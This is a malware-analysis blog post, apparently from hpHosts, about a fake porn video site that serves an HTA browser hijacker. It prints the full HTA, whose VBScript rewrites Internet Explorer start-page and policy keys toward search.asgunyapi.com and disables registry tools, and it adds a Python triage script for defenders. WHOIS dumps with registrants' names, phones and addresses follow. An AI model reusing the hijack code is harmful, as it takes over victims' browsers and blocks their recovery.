Blog for hpHosts, and whatever else I feel like writing about ....

Saturday 8 January 2011

RapidSwitch, fake movies and a browser hijack

Whilst investigating a site earlier, I stumbled upon a site claiming to be a vanilla porn site. Not surprisingly, it turned out to be slightly more than that.

This site offers its victims the usual player you're used to seeing on the likes of YouTube, with a major difference. Instead of a fake codec or an actual video, an HTA (HTML Application) is downloaded and executed; mshta.exe runs the script inside it with the user's full rights rather than under the browser's zone restrictions, and it contains:

<html><head>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
self.Close
</SCRIPT>

<script language="JavaScript">
<!--
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==',')
windowProperties=windowProperties.substring(0,windowProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
</body>
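As an added example (not code from the original post), here is a small Python triage script for an HTA like the one above. It pulls out the WScript.Shell RegWrite calls, normalises the registry paths the way RegWrite itself reads them (a VBScript string has no escape sequences, so the doubled backslash in "Main\\Start Page" is literally two backslashes, and RegWrite takes the last component as the value name), flags the writes that redirect or lock the browser, and lists the hosts the sample points at. The embedded sample is the VBScript block and body tag copied from the HTA above; the rule descriptions state what those Internet Explorer and policy values do, and the function names and rule table are mine.

```python
"""Static triage of an HTA browser hijacker (added example, not the post's code).
Extracts WScript.Shell RegWrite calls and URLs from an HTA, normalises the
registry paths as RegWrite reads them, and flags writes that redirect or lock
the browser.  SAMPLE_HTA is the VBScript block and <body> tag of the HTA
quoted in the post, embedded so the script runs offline."""
import re
from dataclasses import dataclass
from typing import Optional

SAMPLE_HTA = r'''
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
self.Close
</SCRIPT>
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
'''

@dataclass(frozen=True)
class RegWrite:
    hive_key: str  # e.g. HKCU\SOFTWARE\Microsoft\Internet Explorer\Main
    name: str      # value name; empty when the call only creates a key
    data: str
    kind: str      # REG_SZ, REG_DWORD, ...

# obj.regwrite "path","data"[,"type"]; VBScript is case-insensitive.
REGWRITE_RE = re.compile(
    r'\.regwrite\s+"([^"]*)"\s*,\s*"([^"]*)"(?:\s*,\s*"([^"]*)")?', re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def normalise_path(path: str) -> str:
    # VBScript strings have no escapes, so "Main\\Start Page" really contains
    # two backslashes; RegWrite treats the run as one separator.  Collapse it.
    return re.sub(r"\\+", lambda _m: "\\", path)

def parse_regwrites(hta: str) -> list:
    writes = []
    for path, data, kind in REGWRITE_RE.findall(hta):
        full = normalise_path(path)
        if full.endswith("\\"):          # trailing backslash: key, not value
            hive_key, name = full.rstrip("\\"), ""
        else:                            # last component is the value name
            hive_key, _, name = full.rpartition("\\")
        writes.append(RegWrite(hive_key, name, data, kind or "REG_SZ"))
    return writes

# (key suffix, value name or None for any, why it matters); case-insensitive.
HIJACK_RULES = [
    (r"\Microsoft\Internet Explorer\Main", "start page",
     "IE start page redirected"),
    (r"\Policies\Microsoft\Internet Explorer\Control Panel", "homepage",
     "home page locked by policy; Internet Options will not let it be changed back"),
    (r"\CurrentVersion\Policies\System", "disableregistrytools",
     "regedit disabled, so the user cannot undo the other writes by hand"),
    (r"\CurrentVersion\URL\Prefixes", None,
     "IE address-bar prefix expansion pointed at the attacker's site"),
]

def classify(w: RegWrite) -> Optional[str]:
    key, name = w.hive_key.lower(), w.name.lower()
    for suffix, want, why in HIJACK_RULES:
        if key.endswith(suffix.lower()) and (want is None or name == want):
            return why
    return None

def extract_hosts(hta: str) -> set:
    return {h.lower() for h in URL_RE.findall(hta)}

def triage(hta: str) -> dict:
    writes = parse_regwrites(hta)
    paired = [(w, classify(w)) for w in writes]
    return {
        "writes": writes,
        "flagged": [(w, why) for w, why in paired if why],
        "unflagged": [w for w, why in paired if why is None],
        "hosts": extract_hosts(hta),
        # HKLM writes only land when mshta.exe runs with admin rights;
        # the HKCU writes succeed for any user.
        "needs_admin": any(w.hive_key.upper().startswith("HKLM") for w in writes),
    }

if __name__ == "__main__":
    report = triage(SAMPLE_HTA)
    for w, why in report["flagged"]:
        print(f"{w.hive_key}\\{w.name} = {w.data} ({w.kind}): {why}")
    print("unflagged writes:", len(report["unflagged"]))
    print("hosts to block:", sorted(report["hosts"]))
    print("some writes need admin rights:", report["needs_admin"])
```

To triage a captured sample, call triage() on the file's text instead of SAMPLE_HTA. Anything that ends up in "unflagged" is a write the rule table does not know about and is worth reading by hand before adding a rule; the "hosts" set is the block-list material, and "needs_admin" tells you whether the HKLM half of the hijack would have taken effect on a non-admin account.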


You'll have noticed the hijacks to search.asgunyapi.com. This chap is hosted by HostGator (I've already fired off an abuse report) and should hopefully be down soon:

Host: search.asgunyapi.com
Current IP: 74.54.218.98
IP PTR: gator441.hostgator.com
ASN: 21844 74.52.0.0/14 THEPLANET-AS - ThePlanet.com Internet Services, Inc.

Registration Service Provided By: REG2C
Contact: +90.2242248640
Website: http://www.reg2c.com

Domain Name: ASGUNYAPI.COM

Registrant:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Creation Date: 22-Mar-2010
Expiration Date: 22-Mar-2011

Domain servers in listed order:
ns882.hostgator.com
ns881.hostgator.com

Administrative Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Technical Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Billing Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Status:LOCKED


The best part, however, is the delivery site itself: this little chap is hosted by the infamously crimeware-friendly RapidSwitch. RapidSwitch is an ISP with a history of housing everything from warez to phishing to malware. Incidentally, I recently fired off an abuse report to RapidSwitch, and was rather surprised to find they'd finally gone ahead with their promise of blocking me from e-mailing them (better late than never, I suppose; they said they were doing so 2 years ago. A little hint, RapidSwitch: it's not the best way of convincing someone to unblacklist you).

Host: kalitepornolar.org
Current IP: 95.154.242.200
IP PTR: Resolution failed
ASN: 29131 95.154.192.0/18 RAPIDSWITCH-AS RapidSwitch

Domain ID:D160877627-LROR
Domain Name:KALITEPORNOLAR.ORG
Created On:09-Dec-2010 08:57:49 UTC
Last Updated On:09-Dec-2010 13:51:59 UTC
Expiration Date:09-Dec-2011 08:57:49 UTC
Sponsoring Registrar:GoDaddy.com, Inc. (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR69417596
Registrant Name:okan delikaya
Registrant Street1:arn. merk mah eyupsultan cad
Registrant Street2:arnavutkoy
Registrant Street3:
Registrant City:istanbul
Registrant State/Province:arnavutkoy
Registrant Postal Code:34275
Registrant Country:TR
Registrant Phone:+90.05302731122
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: okan@kriptex.com
Admin ID:CR69417598
Admin Name:okan delikaya
Admin Street1:arn. merk mah eyupsultan cad
Admin Street2:arnavutkoy
Admin Street3:
Admin City:istanbul
Admin State/Province:arnavutkoy
Admin Postal Code:34275
Admin Country:TR
Admin Phone:+90.05302731122
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email: okan@kriptex.com
Tech ID:CR69417597
Tech Name:okan delikaya
Tech Street1:arn. merk mah eyupsultan cad
Tech Street2:arnavutkoy
Tech Street3:
Tech City:istanbul
Tech State/Province:arnavutkoy
Tech Postal Code:34275
Tech Country:TR
Tech Phone:+90.05302731122
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email: okan@kriptex.com
Name Server:NS2.KALITELIPORNOLAR.ORG
Name Server:NS1.KALITELIPORNOLAR.ORG
DNSSEC:Unsigned


One of the many sites leading to these fake movie sites is turkpornoizle.tk, which should be down shortly.

Host: turkpornoizle.tk
Current IP: 212.7.200.223
IP PTR: Resolution failed
ASN: 16265 212.7.192.0/19 LEASEWEB LEASEWEB AS
